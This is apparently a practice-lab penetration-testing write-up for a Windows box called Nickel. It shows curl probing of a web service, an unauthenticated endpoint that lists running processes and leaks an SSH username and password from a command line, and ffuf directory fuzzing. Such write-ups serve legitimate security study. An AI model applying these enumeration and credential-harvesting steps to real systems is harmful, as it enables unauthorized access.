Web
Nmap discovered a Web server on the target port 33333
The running service is Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -i http://$IP:33333/
HTTP/1.1 200 OK
Content-Length: 13
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 05 Mar 2025 17:55:13 GMT
Invalid Token/Practice/Nickel/2-Enumeration/attachments/{2CE032A2-BB26-4C3B-8F53-EA8EC1BA937B}.png)
Webroot
Is the web server expecting a token?
Hidden Endpoints
/Practice/Nickel/2-Enumeration/attachments/{6E22E8D1-B083-42F5-B68F-41FA77C1DA61}.png)
/Practice/Nickel/2-Enumeration/attachments/{96A2D6A7-D1A4-4A75-971E-34C809996234}.png)
/Practice/Nickel/2-Enumeration/attachments/{DAC988AD-2492-4736-9201-48FE2FF7A87B}.png)
Checking the endpoints discovered by the web application on the target ports 8089
None of them support GET request
Given the current web server only supports GET and POST, I will try POST
POST
/Practice/Nickel/2-Enumeration/attachments/{22C33DD2-1813-4C8F-AE34-C7A1FFCC6BA0}.png)
N/A for the /list-current-deployments endpoint
/Practice/Nickel/2-Enumeration/attachments/{299B15B9-1CEF-4600-B766-E542F1B55502}.png)
N/A for the list-active-nodes endpoint
/Practice/Nickel/2-Enumeration/attachments/{E9C879C7-72B8-44AE-BAA2-4EF40968E8FB}.png)
200 for the /list-running-procs endpoint
/list-running-procs endpoint
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -X POST http://$IP:33333/list-running-procs -H 'Content-Length: 0'
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : dwm.exe
commandline : "dwm.exe"
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1
name : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"
name : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
name : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
name : vm3dservice.exe
commandline : C:\Windows\system32\vm3dservice.exe
name : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
name : vm3dservice.exe
commandline : vm3dservice.exe -n
name : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
name : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe
name : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3956855 /state1:0x41c64e6d
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
name : MicrosoftEdgeUpdate.exe
commandline : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c
name : SgrmBroker.exe
commandline :
name : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /EmbeddingWhile sending a POST request to the /list-running-procs endpoint lists out the running processes, there is a credential exposure.
The full command is: cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
The credential, ariah:Tm93aXNlU2xvb3BUaGVvcnkxMzkK, appears to be a SSH credential for the nickel-dev host.
/Practice/Nickel/2-Enumeration/attachments/{B17D0BF4-31C6-4587-A76B-55CAEF278B1E}.png)
/Practice/Nickel/2-Enumeration/attachments/{EF1BE89B-8372-4E6D-8B39-7AE5F4C8448E}.png)
Additionally, these 3 commands appear to be responsible for the web servers on the ports 80, 8089 and 33333
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:33333/FUZZ -ic -fs 16
________________________________________________
:: Method : GET
:: URL : http://192.168.219.99:33333/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 16
________________________________________________
:: Progress: [20478/20478] :: Job [1/1] :: 1626 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP:33333/FUZZ/ -ic -fs 16
________________________________________________
:: Method : GET
:: URL : http://192.168.219.99:33333/FUZZ/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 16
________________________________________________
:: Progress: [207630/207630] :: Job [1/1] :: 1600 req/sec :: Duration: [0:02:12] :: Errors: 0 ::N/A